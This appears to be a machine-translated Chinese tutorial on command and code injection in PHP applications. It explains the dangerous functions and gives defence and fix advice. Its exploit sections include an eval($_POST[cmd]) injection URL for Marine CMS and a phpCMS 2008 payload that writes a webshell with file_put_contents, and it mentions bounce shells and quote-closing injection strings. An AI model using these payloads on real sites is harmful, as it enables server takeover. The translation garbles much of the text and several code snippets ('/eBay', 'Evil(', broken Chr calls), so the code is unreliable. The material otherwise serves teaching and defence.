Shulou(Shulou.com)06/01 Report--

0x01: an introduction to command execution vulnerabilities

The user submits the execution command through the browser, and because the server does not filter the execution function, the command is executed without specifying an absolute path, which may allow the user to execute a maliciously constructed code by changing $PATH or other aspects of the program execution environment.

0x02: command execution VS code execution

1. Command execution vulnerability:

Directly call operating system commands

two。 Code execution vulnerabilities:

Invoke operating system commands by executing script code

The principle of command execution:

In the operating system, "&, | |, | |" can be used as a command connector. The user submits the execution command through the browser. Because the server side does not filter the execution function, it causes the command to be executed without specifying an absolute path.

The principle of code execution:

Applications sometimes need to call some functions that execute system commands, such as system, exec, assert, shell_exec, passthru, popen, proc_popen in PHP

Escapeshellcmd, pcntl_exec, etc., when users can control the parameters in these functions, malicious system commands can be concatenated into normal commands, resulting in command execution *, which is a command execution vulnerability. The above functions are mainly used in webshell, in fact, there is little difference in normal applications, and the first three are the most used.

0x03: command execution vulnerability exploitation condition

Apply functions that call to execute system commands

Splices the user input into the command line as a parameter of the system command

User input is not filtered or not strictly filtered.

0x04: classification of command execution vulnerabilities

1. Code layer filtering is not strict

Some of the core code of commercial applications is encapsulated in binaries and called through system functions in web applications:

System ("/ bin/program-- arg$arg")

two。 A loophole in the system caused command injection

Bash shell breakage (CVE-2014-6271)

3. There is a code execution vulnerability in the called third-party component

Such as the ImageMagick component used to process pictures in WordPress

Command execution vulnerabilities in JAVA (struts2/ElasticsearchGroovy, etc.)

ThinkPHP command execution

0x05: the use of command function

1. The System:system function can be used to execute an external application and output the corresponding execution result. The function prototype is as follows:

String system (string command, int&return_var)

Where command is the command to be executed, and return_var stores the status value after the execution of the command.

2. The Exec:exec function can be used to execute an external application

String exec (string command, array&output, int & return_var)

Where command is the command to be executed, output is every line string that gets the output of the execution command, and return_var stores the status value after the execution of the command.

The 3.Passthru:passthru function can be used to execute a UNIX system command and display the original output. When the output of the UNIX system command is binary data and needs to return the value directly to the browser, you need to use the passthru function instead of the system and exec functions. The prototype of the Passthru function is as follows:

Void passthru (string command, int&return_var)

Where command is the command to be executed, and return_var stores the status value after the command is executed.

4. Shell_exec: execute the shell command and return the output string. The function prototype is as follows:

String shell_exec (string command)

Where command is the command to be executed.

0x06: common controllable position of command

The common controllable position situations are as follows:

System ("$arg"); / / the controllable point is directly the program to be executed

System ("/ bin/prog $arg"); / / the controllable point is the entire parameter of the incoming program

System ("/ bin/prog-p $arg"); / / the controllable point is the value of a parameter passed into the program (unquoted package)

System ("/ bin/prog-- p =\" $arg\ "); / / the controllable point is the value of a parameter passed into the program (wrapped in double quotes)

System ("/ bin/prog-- paired argument arg'); / / the controllable point is the value of a parameter passed into the program (wrapped in single quotation marks)

Sys=ctypes.cdll.LoadLibrary ('/ lib64/libc.so.6') sys.system (cmd) the first case

If we can directly control $arg, then we can execute arbitrary commands. There is not much to say.

The second case

The point we can control is the entire parameter of the program, and we can directly use & & | | or, etc., and, or, pipe commands to execute other commands (which can involve a lot of linux command-line tricks).

There is also a partial situation, when $arg is processed by escapeshellcmd, we can not go beyond the scope of this external program, we can see whether the program itself has the parameter or function of "executing external commands". For example, the sendmail command under linux has the function of reading and writing files, which we can use to write webshell.

The third situation

The point we control is a parameter, and we can also use the and, OR, and channels to execute other commands, the situation is the same as the two.

The fourth situation

In this case, the pressure is a little bit higher, there is a double quotation mark package. If the quotation marks are not escaped, we can close the quotation marks first and then use them according to the third case. If the quotation marks are escaped (addslashes), we don't have to worry. The variable in the middle of the double quotation mark can also be parsed in the linux shell environment. We can use the back quotation mark to execute any command `id` within the double quote.

The fifth situation

This is the hardest case, because there is only a string inside the single quotation marks, and we have to close the single quotation marks before we can execute the command. For example: system ("/ bin/prog-paired AAA'| id")

The harm is self-evident. You can read and write files, bounce shell, gain system permissions, private network * *, and so on.

In vulnerability detection, in addition to echo command injection (such as executing dir commands or cat reading system files), you can also use blind typing, such as a directory on the curl remote machine (see access.log), or get the request issued by the vulnerability machine through dns parsing.

0x07: command vulnerability harm

Inherit the permissions of the Web service program to execute system commands or read-write files

Rebound shell

Control the entire website or even the server

Further intranet horizontal * *

0x08: Marine cms instance

Commands execute commonly used functions, such as eval (), system (), proc_open (), and so on, so being able to execute php code is usually the eval () function.

Search for the eval function on this page.

For ($strIf); $strThen=$iar [2] [$m]; $strThen=$this- > parseSubIf ($strThen); if (strpos ($strThen,$labelRule2) = false) {if (strpos ($strThen,$labelRule3) > = 0) {$elsearray=explode ($labelRule3,$strThen); $strThen1=$elsearray [0]; $strElse1=$elsearray [1] @ eval ("if (". $strIf. ") {\ $ifFlag=true;} else {\ $ifFlag=false;}); if ($ifFlag) {$content=str_replace ($iar [0] [$m], $strThen1,$content);} else {$content=str_replace ($iar [0] [$m], $strElse1,$content);} else {@ eval (" if (". $strIf.") {\ $ifFlag=true;} else {\ $ifFlag=false } "); if ($ifFlag) $content=str_replace ($iar [0] [$m], $strThen,$content); else$content=str_replace ($iar [0] [$m],", $content);}

You can print the variables at the next breakpoint here.

You can clearly see that it was here that our orders were carried out.

Http://192.168.0.37search.php?searchtype=5&tid=&area=eval($_POST[cmd])

Kitchen knife connection

0x09: command execution vulnerabilities are often bypassed

0x10: command execution vulnerability defense

1. Try not to use the system to execute commands

two。 Before entering the command function method, variables must be filtered to escape sensitive characters.

3. Before using dynamic functions, make sure that the function you use is one of the specified functions

4. For the PHP language, it is best not to use dangerous functions that are not fully controlled

Second, the causes of code injection 0x11 and code injection vulnerabilities.

When the application calls some functions that can convert a string into code (such as eval in php), it does not consider whether the user can control the string, which will cause a code injection vulnerability.

Several commonly used languages have related functions that convert strings into code to execute, such as:

PHP:eval 、 assert

Javascript:eval

_ Vbscript: Execute 、 Eval

Python:exec

There is no function in Java:Java that can directly convert strings into code execution like the eval function in php, but there are reflection mechanisms and various expression engines based on reflection mechanisms, such as OGNL, SpEL, MVEL, etc., all of which can cause code execution vulnerabilities.

Applications sometimes consider flexibility and simplicity and call functions such as eval in the code to deal with it. For example, the string2array function that is commonly used in phpcms:

Function string2array ($data) {if ($data = =') return array (); @ eval ("\ $array = $data;"); return $array;}

The main functions that can cause code injection in PHP: eval, preg_replace + / e mode, assert

Generally use the first two, CMS rarely use assert, as for some partial gate function is even less, the use of the case is limited to the back door. Some common uses are as follows:

Eval ("\ $ret = $data;"); eval ("\ $ret = deal ('$data');"); eval ("\ $ret = deal (" $data ");"); preg_replace ('/ (. *) / eBay,'$ret = "\\ 1";'); preg_replace ("/\ s*\ [php\] (. +?)\ [\ / php\]\ s*/ies", "\\ 1", $_ GET ['h']);? >

The first is what I just said about phpcms. Usually $data doesn't come directly from POST or GET variables (or it's too watery), but code execution is likely to be created through some secondary vulnerabilities (such as SQL injection). The second is to use a function (deal) to process $data and then assign it to $ret. In that case, the way of passing parameters is very important. The second one uses single quotation marks to pass parameters, so we can only close the single quotation marks before injecting the code. If the application globally does addslashes or GPC=on, you will not be able to inject code. The third is similar to the second, but uses double quotation marks to pass parameters. Double quotation marks have a very important feature in the code, it can parse the function, such as we pass ${phpinfo ()}, phpinfo will be executed, and the resulting return value will be passed into the deal function as an argument. At this point, we don't have to think about closing quotation marks. The fourth is the misuse of the preg_replace function, which occurs most often, because in the second parameter of preg_replace, the regular result\\ 1 is wrapped in double quotation marks, and arbitrary code can be executed in the way in the third.

Note that in the fifth example, the package\\ 1 can be in double quotation marks or single quotation marks, which can cause the command to execute, submitting h = [php] phpinfo () [/ php].

Php curly syntax: ${`ls`} it executes the code in curly braces and replaces the result back.

0x12, phpCMS 2008 command execution vulnerability

Index.php?userid=abc&menu=xxx

The userid filled in when we visit cannot be found in the database, so it is impossible to extract the definition of the $menu variable from the results returned from the database. But at the beginning, the program will extract all the parameters obtained by $_ GET, so that the value of the menu variable can be controlled by us.

Since $menu is not empty, if menu=phpinfo (); exit (); executes the string2array function internally

Eval ("\ $arr=$data"); executes the command, that is, eval ("\ $arr=phpinfo (); exit ();")

Further, we can write a sentence as a webshell file and put it in the website server directory

In a word *

Menu=file_put_contents ('shell.php',')

To prevent command execution from being unsuccessful due to escaping, you can use the ascii code, that is,

Index.php?userid=abc&menu=file_put_contents (CHR 115,104). Chr (1010). Chr (108). Chr (42). Chr (11212). Chr (10412). Chr (...); exit ()

Next time we can go directly to shell.php?func=system&cmd=dir and execute the php code system (dir).

Similar functions that cause variable overrides include: import_request_variables (), parse_str (), etc.

0x13, code injection bypassing 0x14 and OOB with data

0x15, code injection fixes

If you can use json to save arrays, use json for objects. Do not save php objects as strings, otherwise you need to use eval when reading them. The process of converting a string to an object is actually a process of converting data into code, which is prone to vulnerabilities, such as code execution caused by php's unserialize and ognl command execution of struts2.

In cases where eval must be used, make sure that users do not have easy access to eval parameters (or use rules to strictly determine the format of the input data). For strings, be sure to use single quotation marks to wrap the controllable code and addslashes before insertion, so that you cannot close single quotation marks and cannot execute ${} because it is not a double quote package.

Evil ('${phpinfo ()}'), evil ("phpinfo ()"), etc. will not be executed. Evil ("${phpinfo ()}"), evil (phpinfo ()), and evil (${@ phpinfo ()}) can all be executed, because the contents of the double quotation marks will be parsed as variables once, and the @ before the function indicates that there is no error when executing the function.

$data = addslashes ($data); eval ("\ $data = deal ('$data');")

Instead of using the e modifier of preg_replace, use preg_replace_callback instead. If you have to use preg_replace 's e mode, make sure that in the second parameter, the regular matching object is wrapped in single quotation marks (the fourth example).

Make sure register_globals = off, and if you can't customize the php.ini, you should control it in the code; second, be familiar with the functions and methods that may cause variable overrides, and check whether the user can control the source of the variables; finally, get into the habit of initializing variables.

Functions that can be written locally need to be focused on, such as file_put_contents (), fwrite (), fputs (), etc.

In automated vulnerability detection, you can directly bring in something like "; print (md5 (test)); $a =" to match whether the returned page has a md5 string.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.